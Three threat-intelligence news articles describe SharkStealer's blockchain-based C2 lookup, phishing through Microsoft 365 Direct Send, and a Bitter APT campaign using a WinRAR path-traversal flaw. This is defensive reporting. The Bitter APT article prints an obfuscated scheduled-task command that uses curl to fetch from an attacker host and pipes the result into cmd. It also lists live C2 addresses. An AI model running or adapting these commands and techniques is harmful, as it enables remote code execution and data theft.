A sophisticated information-stealing malware written in Golang has emerged, leveraging blockchain technology to establish covert command-and-control channels.

SharkStealer represents a significant evolution in malware design, utilizing the BNB Smart Chain Testnet as a resilient dead-drop resolver for its C2 infrastructure.

This novel approach demonstrates how threat actors exploit Web3 technologies to evade traditional detection mechanisms and maintain persistent communication channels.

The malware employs an innovative technique known as EtherHiding, where critical infection chain components are stored on public blockchains rather than conventional web servers.

This method transforms immutable blockchain networks into censorship-resistant infrastructure that defenders struggle to disrupt or monitor effectively.

By embedding C2 addresses within smart contract responses, SharkStealer creates a distributed communication layer that remains operational even when traditional domains or IP addresses are blocked.

SharkStealer’s attack vector centers on leveraging the transparency and availability of public blockchain networks while maintaining operational security through encryption.

VMRay analysts identified that the malware issues Ethereum RPC eth_call requests to specific smart contracts deployed on the BSC Testnet nodes.

These contracts serve as encrypted data repositories, returning tuples containing an initialization vector (IV) and encrypted payload when queried.

The malware then decrypts this data using a hardcoded AES-CFB key embedded within the binary, ultimately extracting the actual C2 server addresses.

Technical Analysis of C2 Resolution

The infection mechanism operates through a multi-stage process that begins with establishing a secure connection to data-seed-prebsc-2-s1.binance.org:8545, the BSC Testnet RPC endpoint.

The code snippet below illustrates how SharkStealer constructs the JSON-RPC request:-

v87.Jsonrpc.ptr = "2.0";
v87.Method.ptr = "eth_call";
v77.To.ptr = "0x3dd7a9c28cfedf1c462581eb7150212bcf3f9edf";
v77.Data.ptr = "0x24c12bf6";

The malware’s C2 resolution mechanism demonstrates sophisticated engineering combining blockchain interaction with traditional cryptographic techniques.

Once the eth_call request reaches target smart contract addresses—specifically 0xc2c25784E78AeE4C2Cb16d40358632Ed27eeaF8E and 0x3dd7a9c28cfedf1c462581eb7150212bcf3f9edf—the contracts execute function 0x24c12bf6, returning encrypted C2 data.

The decryption process utilizes AES-CFB mode, combining the hardcoded key with the dynamically retrieved IV to decrypt the payload.

Analysis of sample SHA-256 hash 3d54cbbab911d09ecaec19acb292e476b0073d14e227d79919740511109d9274 revealed active C2 servers at 84.54.44.48 and securemetricsapi.live, demonstrating the technique’s operational effectiveness.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post SharkStealer Using EtherHiding Pattern to Resolves Communications With C2 Channels appeared first on Cyber Security News.

Microsoft 365 Exchange Online’s Direct Send feature, originally designed to enable legacy devices and applications to send emails without authentication, has become an exploitable pathway for cybercriminals conducting sophisticated phishing and business email compromise attacks.

The feature allows multifunction printers, scanners, and older line-of-business applications to transmit messages by bypassing rigorous authentication and security checks, creating an operational convenience that adversaries have weaponized to circumvent standard content filters and domain verification protocols.

Recent investigations reveal a surge in malicious campaigns exploiting Direct Send to deliver fraudulent messages that appear to originate from trusted internal sources.

Threat actors emulate legitimate device traffic and send unauthenticated emails impersonating executives, IT help desks, and internal users.

These campaigns frequently employ business-themed social engineering lures, including task approvals, voicemail notifications, and payment prompts designed to manipulate recipients into divulging credentials or sensitive information.

Cisco Talos analysts identified increased activity by malicious actors leveraging Direct Send as part of coordinated phishing campaigns and BEC attacks.

Security researchers from multiple organizations, including Varonis, Abnormal Security, Ironscales, Proofpoint, Barracuda, and Mimecast, have independently confirmed similar findings, indicating that adversaries have actively targeted corporations using Direct Send in recent months.

Direct Send Exploitation

The attacks exploit the feature’s ability to inherit implicit trust from Exchange infrastructure, decreasing payload scrutiny and enabling messages to bypass critical sender verification mechanisms.

The exploitation technique centers on circumventing three fundamental email authentication protocols: DomainKeys-Identified Mail (DKIM), Sender Policy Framework (SPF), and Domain-based Message Authentication, Reporting and Conformance (DMARC).

Under normal circumstances, these protocols verify message authenticity through cryptographic signatures, authorized IP ranges, and policy enforcement.

However, Direct Send prevents this inspection, allowing spoofed messages to reach recipients unchallenged.

Attackers have embedded QR codes within PDFs and crafted empty-body messages with obfuscated attachments, successfully evading traditional content filters and directing victims to credential harvesting pages.

Microsoft has responded by introducing a Public Preview of the RejectDirectSend control and announcing future enhancements, including Direct Send-specific usage reports and a default-off configuration for new tenants.

Organizations can mitigate risks by disabling Direct Send where feasible using the command Set-OrganizationConfig -RejectDirectSend $true after validating legitimate mail flows, migrating devices to authenticated SMTP submission on port 587, and implementing tightly scoped IP restrictions for devices unable to authenticate properly.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Hackers Abuse Microsoft 365 Exchange Direct Send to Bypass Content Filters and Harvest Sensitive Data appeared first on Cyber Security News.

The Bitter APT group, also tracked as APT-Q-37 and known in China as 蔓灵花, has launched a sophisticated cyberespionage campaign targeting government agencies, military installations, and critical infrastructure across China and Pakistan.

The threat actor has deployed weaponized Microsoft Office documents that exploit a previously unknown zero-day vulnerability in WinRAR archive software to install custom C# backdoors on victim systems.

This multi-pronged attack demonstrates a significant evolution in the group’s technical capabilities and persistence mechanisms.

The campaign leverages two distinct infection vectors to deliver malicious payloads. The first method employs VBA macro-laden Excel files disguised as legitimate conference documentation, while the second exploits a WinRAR path traversal vulnerability predating CVE-2023-38088.

Both approaches ultimately deploy the same C# backdoor designed to exfiltrate sensitive data and execute arbitrary commands from remote servers.

The attackers carefully crafted their social engineering lures to target specific personnel within government and defense sectors, indicating prior reconnaissance and victim profiling.

Qianxin analysts identified the malicious activity in October 2024 after detecting anomalous network traffic patterns originating from compromised systems.

The researchers traced the infrastructure back to command-and-control servers hosted on the esanojinjasvc.com domain, which was registered in April 2024 specifically for this operation.

Analysis revealed that the backdoor communicates with multiple subdomains including msoffice.365cloudz.esanojinjasvc.com, employing sophisticated encryption techniques to evade network-based detection systems.

The attack chain begins when victims receive phishing emails containing malicious RAR archives with names like “Provision of Information for Sectoral for AJK.rar.”

Upon extraction with vulnerable WinRAR versions (7.11 or earlier), the archive exploits a path traversal flaw to overwrite the user’s Normal.dotm template file.

When Microsoft Word subsequently launches, it automatically loads the compromised template, triggering embedded macros that download and execute the winnsc.exe backdoor from the remote server koliwooclients.com using SMB network shares.

Persistence Mechanisms and Backdoor Functionality

The malware establishes persistence through multiple redundant mechanisms to ensure continued access.

The macro code implements a function called periperi() that creates a batch file named kefe.bat in the Windows Startup directory.

This script establishes a scheduled task titled “OneDrive\Updates1100988844” that executes every 26 minutes, making POST requests to hxxps://www.keeferbeautytrends.com/d6Z2.php.

The scheduled task command utilizes string obfuscation techniques to evade signature-based detection:-

s^ch^t^a^s^k^s /create /tn "OneDrive\Updates1100988844" /f /sc minute /mo 26 /tr "conhost --headless cmd /v:on /c set 765=ht& set 665=tps:& set 565=!765!!665!& curl !465!.com/d6Z2.p^h^p?rz=%computername%SS | c^m^d"

The C# backdoor employs AES encryption for string obfuscation through a dedicated decryption function named gjfdkgitjkg().

This function decrypts critical configuration data including C2 URLs, file paths, and POST parameters.

The backdoor continuously collects system information including the temporary directory path, operating system architecture, and hostname, transmitting this data to hxxps://msoffice.365cloudz.esanojinjasvc.com/cloudzx/msweb/drxbds23.php.

Based on C2 server responses, the malware downloads additional executables, repairs their PE headers by adding the DOS signature {0x4D 0x5A}, validates the file structure, and executes them while reporting success or failure codes back to hxxps://msoffice.365cloudz.esanojinjasvc.com/cloudzx/msweb/drxcvg45.php.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Bitter APT Hackers Exploit WinRAR Zero-Day Via Weaponized Word Documents to Steal Sensitive Data appeared first on Cyber Security News.